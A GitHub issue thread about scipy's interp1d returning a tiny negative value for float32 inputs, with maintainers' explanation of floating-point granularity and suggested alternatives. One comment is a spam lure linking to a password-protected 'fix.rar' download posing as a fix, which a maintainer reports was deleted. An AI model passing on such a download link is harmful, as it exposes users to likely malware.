### ISSUE TITLE
BUG: interp1d linear interpolation produces negative output on non-negative np.float32 inputs

### ISSUE THREAD

**Issue by jameswilburlewis** [scipy/scipy#21459]
### Describe your issue.

I have a time series of non-negative data values (which may include zero values).  When I use interp1d with kind='linear', and pass a time value exactly equal to an input time where the input value is zero, I expect it to return a value of zero, but the result is a small negative value.  This causes issues later on, when I pass the interpolated data to a routine which requires non-negative inputs.  In the example below, changing the values_input data type from np.float32 to np.float64 gives the expected output of 0.0.

### Reproducing Code Example

```python
import scipy
import numpy as np
time_strings_input = np.array(['2018-07-01T13:02:16.892474880',
                               '2018-07-01T13:02:16.922475008',
                               '2018-07-01T13:02:16.952474880'])
values_input = np.array([0.028584518, 0., 0.013626526],dtype=np.float32)

input_times_npdt64 = np.array([np.datetime64(t) for t in time_strings_input])
interp_to_times_npdt64 = np.array(input_times_npdt64[1])

input_times_float64 = input_times_npdt64.astype(np.float64)
interp_to_time_float64 = interp_to_times_npdt64.astype(np.float64)

interpolator = scipy.interpolate.interp1d(input_times_float64, values_input, kind='linear')
result=interpolator(interp_to_time_float64)
print(result)
# Expected result: 0.0
# Actual result: -3.469446951953614e-18
```

### Error message

```shell
No error message
```

### SciPy/NumPy/Python version and system information

```shell
import sys, scipy, numpy; print(scipy.__version__, numpy.__version__, sys.version_info); scipy.show_config()
1.11.2 1.25.2 sys.version_info(major=3, minor=9, micro=18, releaselevel='final', serial=0)
Build Dependencies:
  blas:
    detection method: pkgconfig
    found: true
    include directory: /opt/arm64-builds/include
    lib directory: /opt/arm64-builds/lib
    name: openblas
    openblas configuration: USE_64BITINT= DYNAMIC_ARCH=1 DYNAMIC_OLDER= NO_CBLAS=
      NO_LAPACK= NO_LAPACKE= NO_AFFINITY=1 USE_OPENMP= SANDYBRIDGE MAX_THREADS=3
    pc file directory: /opt/arm64-builds/lib/pkgconfig
    version: 0.3.21.dev
  lapack:
    detection method: pkgconfig
    found: true
    include directory: /opt/arm64-builds/include
    lib directory: /opt/arm64-builds/lib
    name: openblas
    openblas configuration: USE_64BITINT= DYNAMIC_ARCH=1 DYNAMIC_OLDER= NO_CBLAS=
      NO_LAPACK= NO_LAPACKE= NO_AFFINITY=1 USE_OPENMP= SANDYBRIDGE MAX_THREADS=3
    pc file directory: /opt/arm64-builds/lib/pkgconfig
    version: 0.3.21.dev
  pybind11:
    detection method: config-tool
    include directory: unknown
    name: pybind11
    version: 2.10.4
Compilers:
  c:
    commands: cc
    linker: ld64
    name: clang
    version: 14.0.0
  c++:
    commands: c++
    linker: ld64
    name: clang
    version: 14.0.0
  cython:
    commands: cython
    linker: cython
    name: cython
    version: 0.29.36
  fortran:
    commands: gfortran
    linker: ld64
    name: gcc
    version: 12.1.0
  pythran:
    include directory: ../../pip-build-env-piqwhf8d/overlay/lib/python3.9/site-packages/pythran
    version: 0.13.1
Machine Information:
  build:
    cpu: aarch64
    endian: little
    family: aarch64
    system: darwin
  cross-compiled: false
  host:
    cpu: aarch64
    endian: little
    family: aarch64
    system: darwin
Python Information:
  path: /private/var/folders/76/zy5ktkns50v6gt5g8r0sf6sc0000gn/T/cibw-run-b55l7izd/cp39-macosx_arm64/build/venv/bin/python
  version: '3.9'
```

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rkern** [comment]
Spam comment reported and deleted. Carry on.

**Comment by ev-br** [comment]
The reported result is smaller than the float64 machine epsilon. 

The OP example involves casting between integers (via `np.datetime[ns]`, float32 and float64). The integers themselves are large, and it's not very surprising that in the end of the day the granularity of floating-point numbers shows up. This is of course implementation details leaking through. Experience tells us that tweaking anything in interp1d is very brittle (which is one reason it's declared legacy), and we cannot really guarantee results to be more accurate than the machine epsilon anyway.

All in all,  I'd suggest to either `np.clip` the interp1d result to zero, or use one of alternative linear interpolation routines (which also may or may need `np.clip`-ing):

```
 In [11]: np.interp(interp_to_time_float64, input_times_float64, values_input)
Out[11]: 0.0

In [12]: scipy.interpolate.make_interp_spline(input_times_float64, values_input, k=1)(in
    ...: terp_to_time_float64)
Out[12]: array(0.)
```

**Comment by ev-br** [comment]
Thank you @rkern !

**Comment by jameswilburlewis** [comment]
Thanks @ev-br for the explanation and the suggested alternatives!  I am actually making these interpolation calls indirectly, via the xarray DataArray interp() method, so I will post an issue over there and see if they might be willing to switch to make_interp_spline().

**Comment by hollymandel** [comment]
I have a question that arose while investigating this from the `xarray` side. It seems that `scipy.interpolate.interp1d` will not pass the linear interpolation to `np.interpolate` [if the data type is `np.float32`](https://github.com/scipy/scipy/blob/8ca4ace96cff522024b84e227b24b4324491faa1/scipy/interpolate/_interpolate.py#L362). I'm not sure if the behavior of `numpy` is different in this case but at any rate it won't error. 

```python
np_dtypes = (np.dtype(np.float64), np.dtype(int))

x = np.asarray([ 1,3 ], dtype=np.float32)
xx = np.asarray([ 2 ], dtype= np.float32)
y = np.asarray([ 3,4], dtype=np.float32)

print(y.dtype in np_dtypes) # False
np.interp(xx,x,y) # no error
```

So I'm wondering what the reason is for this? Thanks for your help.

**Comment by ev-br** [comment]
git blame points to https://github.com/scipy/scipy/pull/5902 as the PR which changed from delegating to `np.interp` for all float dtypes to float64 only. It does not seem to mention float32 specifically, but it does deal with dtype stability. Currently:

```
In [13]: x = np.arange(5, dtype=np.float32)

In [14]: np.interp(np.float32(1), x, x).dtype
Out[14]: dtype('float64')

In [15]: interp1d(x, x, kind='linear')(np.float32(1)).dtype
Out[15]: dtype('float32')
```

So while delegating to numpy for float32 inputs is very easy technically, it does have backwards compatibility concerns. Those can be worked around, of course. Experience tells us that touching anything in interp1d breaks something for somebody. 
So overall the cost/benefit ratio is not in favor IMO, at least at this point in the `interp1d` lifecycle.

**Comment by hollymandel** [comment]
Ah makes sense, thanks for clarifying @ev-br!
